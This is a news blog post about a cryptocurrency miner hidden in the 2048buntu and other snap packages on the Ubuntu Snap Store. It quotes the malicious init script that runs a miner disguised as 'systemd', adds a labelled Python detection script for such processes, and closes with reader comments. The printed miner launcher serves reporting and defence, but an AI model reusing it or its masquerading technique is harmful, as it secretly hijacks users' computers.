Oh, snap! Just because some packages are available to install directly from the Ubuntu Software Center doesn't make them safe. This is proved by a recent discovery of malware in some snap packages from the Ubuntu Snaps Store.
At least two of the snap packages, 2048buntu and Hextris, uploaded to the Ubuntu Snaps Store by user Nicolas Tomb, contained malware. All packages by Nicolas have since been removed from the Ubuntu Snaps Store, "pending further investigations".
The report comes from a bug which mentions that the 2048buntu snap package (and other packages by Nicolas Tomb) contains a hidden cryptocurrency miner inside. You can see the init script below:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try: the miner binary is shipped inside the snap under the name "systemd"
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch: fall back to picking the thread count from the number of CPU cores
    cores=($(grep -c ^processor /proc/cpuinfo))
    if (( $cores < 4 )); then
        /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
    else
        /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
    fi
}
Yes, the miner script really does pass myfirstferrari@protonmail.com to the miner. I guess that's one way of getting a Ferrari... 🙂
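As an added example (not part of the original post or the bug report), here is a small detection check a defender could run on an Ubuntu host: it flags processes whose executable lives inside a snap but carries a system-daemon name, or whose command line has the "-u <email> --<coin> <threads>" shape of the script above. The process table is constructed sample data; the daemon-name list and the coin flags other than bcn are assumptions.

```python
import os
import re
from dataclasses import dataclass
# Assumed starting list: names a snap has no business shipping as its own executable.
SYSTEM_BINARY_NAMES = {"systemd", "init", "kthreadd", "kworker"}
# 2048buntu's script passed "-u <email>" and "--<currency> <threads>"; the
# coin names besides bcn are assumptions, not taken from the post.
EMAIL_ARG = re.compile(r"(^|\s)-u\s+[^\s@]+@[^\s@]+\.[a-z]{2,}")
COIN_FLAG = re.compile(r"(^|\s)--(bcn|xmr|monero|bytecoin)\s+\d+\b")
SNAP_EXE = re.compile(r"^/snap/([^/]+)/(current|\d+)/")

@dataclass(frozen=True)
class Proc:
    pid: int
    exe: str      # resolved executable path, i.e. readlink /proc/<pid>/exe
    cmdline: str  # argv joined with spaces

def flag_process(p: Proc) -> list[str]:
    """Return the reasons a process looks like the snap miner (empty if none)."""
    reasons = []
    m = SNAP_EXE.match(p.exe)
    if m and os.path.basename(p.exe) in SYSTEM_BINARY_NAMES:
        reasons.append(f"snap {m.group(1)!r} ships its own {os.path.basename(p.exe)!r}")
    if EMAIL_ARG.search(p.cmdline):
        reasons.append("mail address passed as -u credential")
    if COIN_FLAG.search(p.cmdline):
        reasons.append("coin flag followed by a thread count")
    return reasons

def scan(procs) -> dict[int, list[str]]:
    """Map pid -> reasons for every process that triggers at least one rule."""
    return {p.pid: r for p in procs if (r := flag_process(p))}

def live_procs():
    """Enumerate /proc on a Linux host, skipping entries we cannot read."""
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue
        yield Proc(int(pid), exe, cmdline)

# Constructed sample process table modelled on the 2048buntu init script.
SAMPLE = [
    Proc(1, "/usr/lib/systemd/systemd", "/sbin/init splash"),
    Proc(4242, "/snap/2048buntu/12/systemd", "/snap/2048buntu/current/systemd -u myfirstferrari@protonmail.com --bcn 2"),
    Proc(4300, "/snap/2048buntu/12/bin/2048", "/snap/2048buntu/current/bin/2048"),
]
```

On a real host, `scan(live_procs())` runs the same rules over /proc; the game's own binary in the sample shows that a snap process is only flagged for the masquerading name or the miner-style arguments, not for living under /snap.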
An interesting aspect is that Nicolas Tomb used a proprietary license for at least some of his snaps. For example, the 2048buntu snap was submitted as proprietary (the game itself was not developed by Nicolas). The game in question, 2048, uses an MIT license, which permits distributing it as proprietary software without making the source code available, as long as the copyright notices are retained.
Side note: 2048buntu was removed from the Ubuntu Snap Store, but you can still check out its page via Google Cache. The package contents, however, can no longer be inspected (unless they're on GitHub somewhere, but I couldn't find them).
How was this possible? Unlike the deb packages in the official Ubuntu repositories, the Ubuntu Snap Store lets anyone upload snap packages. The reason for this is to make more software easily installable for its users.
What's your opinion regarding this? Do you think more and more malware will be getting through to users by allowing anyone to upload packages to the Ubuntu Store, or was this an isolated incident?
News via Reddit (u/Kron4ek).
Canonical doesn't care, they just like to brag about how many apps they have.

I'm not totally against letting anyone upload to the Ubuntu Store, but it should ALL have source code available.

I have the same 2048 game on one of my Android phones, as a game built with Kivy Python. Now I see why the battery was draining so fast.

This is why the AUR on Arch is a separate entity from the regular repos and even custom repos. The AUR has stuff from anyone, but it's clear to everyone what the risks associated with it are, and so people use it (hopefully) with caution.